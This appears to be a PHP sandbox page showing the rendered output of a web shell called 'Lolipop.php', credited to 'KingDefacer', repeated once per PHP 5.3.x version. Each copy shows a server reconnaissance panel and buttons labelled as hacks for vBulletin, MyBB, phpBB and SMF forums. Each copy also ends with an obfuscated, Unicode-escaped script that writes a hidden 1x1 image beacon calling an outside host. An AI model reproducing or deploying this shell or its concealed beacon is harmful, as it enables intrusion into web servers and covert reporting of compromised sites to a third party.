<u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.3
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.3</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.2
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.2</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.1
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.1</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.0
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.0</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>

preferences:
206.31 ms | 409 KiB | 264 Q